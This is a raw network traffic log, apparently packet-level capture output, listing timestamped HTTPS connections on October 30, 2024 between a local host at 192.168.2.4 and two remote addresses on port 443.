                                                Oct 30, 2024 00:23:17.652235985 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.699630976 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.699693918 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.699850082 CET58227443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.699923992 CET58227443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.699923992 CET58227443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.699964046 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.699990034 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.702306986 CET58232443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.702348948 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.702426910 CET58232443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.702572107 CET58232443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.702585936 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.982896090 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.986424923 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.986453056 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.986996889 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.987003088 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.072393894 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.072465897 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.072560072 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.072781086 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.072815895 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.082364082 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.082387924 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.082447052 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.082650900 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.082664967 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.129252911 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.129344940 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.129373074 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.129405975 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.129440069 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.129683018 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.129724026 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.129756927 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.129770041 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.132563114 CET58235443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.132596016 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.132652044 CET58235443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.132868052 CET58235443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.132886887 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.319257975 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.319802046 CET58229443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.319842100 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.320276022 CET58229443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.320287943 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.362593889 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.363167048 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.363208055 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.363758087 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.363770008 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.395934105 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.396414995 CET58231443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.396440029 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.396879911 CET58231443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.396891117 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.453576088 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.453713894 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.453768969 CET58229443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.453866959 CET58229443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.453881979 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.453893900 CET58229443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.453900099 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.454077959 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.454386950 CET58232443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.454418898 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.454802036 CET58232443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.454809904 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.456783056 CET58236443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.456877947 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.456963062 CET58236443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.457082033 CET58236443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.457118034 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.531414986 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.531488895 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.531572104 CET58231443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.531670094 CET58231443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.531687021 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.531725883 CET58231443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.531737089 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.533883095 CET58237443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.533904076 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.533976078 CET58237443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.534097910 CET58237443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.534109116 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.590580940 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.590703964 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.590780020 CET58232443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.590876102 CET58232443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.590900898 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.590940952 CET58232443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.590948105 CET4435823213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.592788935 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.592833042 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.592927933 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.593010902 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.593039036 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.679784060 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.680140972 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.680175066 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.681077003 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.681152105 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.681420088 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.681483030 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.681571960 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.681588888 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.696315050 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.696576118 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.696594000 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.697599888 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.697686911 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.697957993 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.698020935 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.698076010 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.726609945 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.739341974 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.742208004 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.742228985 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.759897947 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.759929895 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.759978056 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.760004997 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.760040998 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.760318041 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.760349035 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.760375023 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.760387897 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.763541937 CET58239443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.763566971 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.763653040 CET58239443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.763820887 CET58239443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.763834000 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.789077044 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.829363108 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.829642057 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.829695940 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.829845905 CET4435823335.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.829859972 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.829921007 CET58233443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.830224037 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.830271959 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.830351114 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.830563068 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.830606937 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.847480059 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.847893000 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.848097086 CET4435823435.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.848166943 CET58234443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.848195076 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.848248005 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.848318100 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.848532915 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:18.848563910 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:18.871589899 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.872303963 CET58235443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.872319937 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:18.872759104 CET58235443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:18.872766018 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.004965067 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.005117893 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.005203962 CET58235443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.005351067 CET58235443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.005363941 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.005376101 CET58235443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.005379915 CET4435823513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.008362055 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.008387089 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.008469105 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.008629084 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.008641958 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.196727037 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.197292089 CET58236443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.197328091 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.197802067 CET58236443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.197818041 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.283236980 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.283639908 CET58237443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.283653975 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.284074068 CET58237443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.284080029 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.328174114 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.328701019 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.328722954 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.329142094 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.329154015 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.331474066 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.331562996 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.331625938 CET58236443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.331746101 CET58236443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.331789970 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.331821918 CET58236443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.331835985 CET4435823613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.334511042 CET58243443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.334561110 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.334644079 CET58243443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.334769011 CET58243443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.334784031 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.419646978 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.419733047 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.419822931 CET58237443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.420059919 CET58237443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.420085907 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.420101881 CET58237443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.420109987 CET4435823713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.423427105 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.423468113 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.423583984 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.423751116 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.423778057 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.451368093 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.451715946 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.451776028 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.452666044 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.452780962 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.453083038 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.453145981 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.453207016 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.453229904 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.453268051 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.457782030 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.457950115 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.457982063 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.458837032 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.458897114 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.459105968 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.459155083 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.459180117 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.463423967 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.463454962 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.463493109 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.463519096 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.463567972 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.463771105 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.463805914 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.463834047 CET58238443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.463849068 CET4435823813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.466730118 CET58245443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.466762066 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.466845989 CET58245443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.466993093 CET58245443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.467011929 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.499335051 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.503324986 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.507817984 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.507910967 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.507935047 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.544070959 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.544503927 CET58239443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.544513941 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.544974089 CET58239443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.544980049 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.554704905 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.603751898 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.604063034 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.604124069 CET4435824035.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.604199886 CET58240443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.609321117 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.609515905 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.609569073 CET4435824135.190.80.1192.168.2.4
                                                Oct 30, 2024 00:23:19.609630108 CET58241443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:23:19.688838959 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.688920975 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.688987017 CET58239443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.689167976 CET58239443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.689192057 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.689205885 CET58239443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.689213037 CET4435823913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.691814899 CET58246443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.691873074 CET4435824613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.691967010 CET58246443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.692089081 CET58246443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.692120075 CET4435824613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.743032932 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.743499994 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.743520975 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.743963957 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.743967056 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.879565001 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.879585028 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.879611015 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.879645109 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.879688025 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.879918098 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.879926920 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.879937887 CET58242443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.879941940 CET4435824213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.882890940 CET58247443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.882929087 CET4435824713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:19.883034945 CET58247443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.883184910 CET58247443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:19.883203030 CET4435824713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.120487928 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.121100903 CET58243443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.121118069 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.121748924 CET58243443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.121754885 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.174972057 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.175378084 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.175430059 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.175920963 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.175939083 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.243145943 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.243522882 CET58245443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.243535042 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.244044065 CET58245443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.244049072 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.254245996 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.254302025 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.254352093 CET58243443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.254573107 CET58243443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.254586935 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.254597902 CET58243443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.254601955 CET4435824313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.257941008 CET58248443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.258003950 CET4435824813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.258110046 CET58248443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.258233070 CET58248443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.258270025 CET4435824813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.310494900 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.310532093 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.310580015 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.310590982 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.310642958 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.310764074 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.310794115 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.310820103 CET58244443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.310832024 CET4435824413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.313479900 CET58249443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.313517094 CET4435824913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.313596964 CET58249443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.313724041 CET58249443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.313740969 CET4435824913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.376300097 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.376418114 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.376487017 CET58245443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.376594067 CET58245443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.376607895 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.376619101 CET58245443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.376624107 CET4435824513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.379412889 CET58250443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.379442930 CET4435825013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.379535913 CET58250443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.379693031 CET58250443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.379717112 CET4435825013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.620142937 CET4435824713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.620824099 CET58247443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.620842934 CET4435824713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.621486902 CET58247443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:20.621491909 CET4435824713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.629777908 CET4435824613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:20.630088091 CET58246443192.168.2.413.107.246.60
